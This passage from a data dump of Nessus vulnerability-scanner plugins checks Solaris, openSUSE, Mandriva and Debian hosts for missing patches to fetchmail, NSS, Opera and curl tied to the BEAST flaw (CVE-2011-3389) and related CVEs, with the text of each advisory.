value:\"CEA-2019-0547\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : fetchmail (multiple_vulnerabilities_in_fetchmail) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The SSL protocol, as used in certain configurations in\n Microsoft Windows and Microsoft Internet Explorer,\n Mozilla Firefox, Google Chrome, Opera, and other\n products, encrypts data by using CBC mode with chained\n initialization vectors, which allows man-in-the-middle\n attackers to obtain plaintext HTTP headers via a\n blockwise chosen-boundary attack (BCBA) on an HTTPS\n session, in conjunction with JavaScript code that uses\n (1) the HTML5 WebSocket API, (2) the Java URLConnection\n API, or (3) the Silverlight WebClient API, aka a 'BEAST'\n attack. (CVE-2011-3389)\n\n - Fetchmail 5.0.8 through 6.3.21, when using NTLM\n authentication in debug mode, allows remote NTLM servers\n to (1) cause a denial of service (crash and delayed\n delivery of inbound mail) via a crafted NTLM response\n that triggers an out-of-bounds read in the base64\n decoder, or (2) obtain sensitive information from memory\n via an NTLM Type 2 message with a crafted Target Name\n structure, which triggers an out-of-bounds read.\n (CVE-2012-3482)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-fetchmail\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90390bc0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11/11 SRU 12.4.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:fetchmail\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^fetchmail$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"fetchmail\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.12.0.4.0\", sru:\"SRU 12.4\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : fetchmail\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"fetchmail\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:19", "description": "The Mozilla NSS libraries were updated to version 3.13.1 to fix various bugs and security problems.\n\nFollowing security issues were fixed :\n\n - SSL 2.0 is disabled by default\n\n - A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n bnc#\n\n - SHA-224 is supported\n\n - NSS_NoDB_Init does not try to open /pkcs11.txt and /secmod.db anymore (bmo#641052, bnc#726096) (CVE-2011-3640)\n\nAlso following bugs were fixed :\n\n - fix spec file syntax for qemu-workaround\n\n - Added a patch to fix errors in the pkcs11n.h header file. (bmo#702090)\n\n - better SHA-224 support (bmo#647706)\n\n - SHA-224 is supported\n\n - Added PORT_ErrorToString and PORT_ErrorToName to return the error message and symbolic name of an NSS error code\n\n - Added NSS_GetVersion to return the NSS version string\n\n - Added experimental support of RSA-PSS to the softoken only", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : nss-201112 (openSUSE-SU-2012:0030-1) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-3640"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libfreebl3", "p-cpe:/a:novell:opensuse:libfreebl3-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3", "p-cpe:/a:novell:opensuse:libsoftokn3-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss", "p-cpe:/a:novell:opensuse:mozilla-nss-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-devel", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-tools", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_NSS-201112-111220.NASL", "href": "https://www.tenable.com/plugins/nessus/75685", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update nss-201112-5564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75685);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3640\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : nss-201112 (openSUSE-SU-2012:0030-1) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Mozilla NSS libraries were updated to version 3.13.1 to fix\nvarious bugs and security problems.\n\nFollowing security issues were fixed :\n\n - SSL 2.0 is disabled by default\n\n - A defense against the SSL 3.0 and TLS 1.0 CBC chosen\n plaintext attack demonstrated by Rizzo and Duong\n (CVE-2011-3389) is enabled by default. Set the\n SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n bnc#\n\n - SHA-224 is supported\n\n - NSS_NoDB_Init does not try to open /pkcs11.txt and\n /secmod.db anymore (bmo#641052, bnc#726096)\n (CVE-2011-3640)\n\nAlso following bugs were fixed :\n\n - fix spec file syntax for qemu-workaround\n\n - Added a patch to fix errors in the pkcs11n.h header\n file. (bmo#702090)\n\n - better SHA-224 support (bmo#647706)\n\n - SHA-224 is supported\n\n - Added PORT_ErrorToString and PORT_ErrorToName to return\n the error message and symbolic name of an NSS error code\n\n - Added NSS_GetVersion to return the NSS version string\n\n - Added experimental support of RSA-PSS to the softoken\n only\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=726096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected nss-201112 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libfreebl3-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libsoftokn3-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-nss-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-nss-certs-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-nss-devel-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-nss-sysinit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-nss-tools-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-32bit-3.13.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nss\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:19", "description": "Multiple vulnerabilities has been found and corrected in fetchmail :\n\nFetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which contains a switch to disable a countermeasure against certain attacks against block ciphers that permit guessing the initialization vectors, providing that an attacker can make the application (fetchmail) encrypt some data for him -- which is not easily the case (aka a BEAST attack) (CVE-2011-3389).\n\nA denial of service flaw was found in the way Fetchmail, a remote mail retrieval and forwarding utility, performed base64 decoding of certain NTLM server responses. Upon sending the NTLM authentication request, Fetchmail did not check if the received response was actually part of NTLM protocol exchange, or server-side error message and session abort. A rogue NTML server could use this flaw to cause fetchmail executable crash (CVE-2012-3482).\n\nThis advisory provides the latest version of fetchmail (6.3.22) which is not vulnerable to these issues.", "cvss3": {}, "published": "2012-09-06T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : fetchmail (MDVSA-2012:149)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-3482"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:fetchmail", "p-cpe:/a:mandriva:linux:fetchmail-daemon", "p-cpe:/a:mandriva:linux:fetchmailconf", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-149.NASL", "href": "https://www.tenable.com/plugins/nessus/61992", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:149. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61992);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3482\");\n script_bugtraq_id(49778, 54987);\n script_xref(name:\"MDVSA\", value:\"2012:149\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Mandriva Linux Security Advisory : fetchmail (MDVSA-2012:149)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple vulnerabilities has been found and corrected in fetchmail :\n\nFetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which\ncontains a switch to disable a countermeasure against certain attacks\nagainst block ciphers that permit guessing the initialization vectors,\nproviding that an attacker can make the application (fetchmail)\nencrypt some data for him -- which is not easily the case (aka a BEAST\nattack) (CVE-2011-3389).\n\nA denial of service flaw was found in the way Fetchmail, a remote mail\nretrieval and forwarding utility, performed base64 decoding of certain\nNTLM server responses. Upon sending the NTLM authentication request,\nFetchmail did not check if the received response was actually part of\nNTLM protocol exchange, or server-side error message and session\nabort. A rogue NTML server could use this flaw to cause fetchmail\nexecutable crash (CVE-2012-3482).\n\nThis advisory provides the latest version of fetchmail (6.3.22) which\nis not vulnerable to these issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.fetchmail.info/fetchmail-SA-2012-01.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.fetchmail.info/fetchmail-SA-2012-02.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected fetchmail, fetchmail-daemon and / or fetchmailconf\npackages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmail-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmailconf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", reference:\"fetchmail-6.3.22-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"fetchmail-daemon-6.3.22-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"fetchmailconf-6.3.22-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:23", "description": "The Opera browser received a security and bugfix update to 11.51.\n\nMore information can be found here:\nhttp://www.opera.com/docs/changelogs/unix/1151/\n\nCVE-2011-3388 - incorrect security information display CVE-2011-3389 - unspecified 'low severity issue, as reported by Thai Duong and Juliano Rizzo.'", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-SU-2011:1025-1) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "p-cpe:/a:novell:opensuse:opera-gtk", "p-cpe:/a:novell:opensuse:opera-kde4", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_OPERA-110906.NASL", "href": "https://www.tenable.com/plugins/nessus/75984", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opera-5115.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75984);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-SU-2011:1025-1) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Opera browser received a security and bugfix update to 11.51.\n\nMore information can be found here:\nhttp://www.opera.com/docs/changelogs/unix/1151/\n\nCVE-2011-3388 - incorrect security information display CVE-2011-3389 -\nunspecified 'low severity issue, as reported by Thai Duong and Juliano\nRizzo.'\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.opera.com/en/latest/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=716002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00016.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"opera-11.51-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"opera-gtk-11.51-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"opera-kde4-11.51-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:19", "description": "Several vulnerabilities have been discovered in cURL, an URL transfer library. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2011-3389 This update enables OpenSSL workarounds against the 'BEAST' attack. Additional information can be found in the cURL advisory\n\n - CVE-2012-0036 Dan Fandrich discovered that cURL performs insufficient sanitising when extracting the file path part of an URL.", "cvss3": {}, "published": "2012-01-31T00:00:00", "type": "nessus", "title": "Debian DSA-2398-2 : curl - several vulnerabilities (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:curl", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2398.NASL", "href": "https://www.tenable.com/plugins/nessus/57738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2398. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57738);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_bugtraq_id(49388, 49778, 51665);\n script_xref(name:\"DSA\", value:\"2398\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Debian DSA-2398-2 : curl - several vulnerabilities (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several vulnerabilities have been discovered in cURL, an URL transfer\nlibrary. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2011-3389\n This update enables OpenSSL workarounds against the\n 'BEAST' attack. Additional information can be found in\n the cURL advisory\n\n - CVE-2012-0036\n Dan Fandrich discovered that cURL performs insufficient\n sanitising when extracting the file path part of an URL.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658276\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2011-3389\");\n script_set_attribute(attribute:\"see_also\", value:\"https://curl.haxx.se/docs/CVE-2011-3389.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2012-0036\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze/curl\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2012/dsa-2398\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the curl packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 7.18.2-8lenny6.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"curl\", reference:\"7.18.2-8lenny6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"curl\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\nif 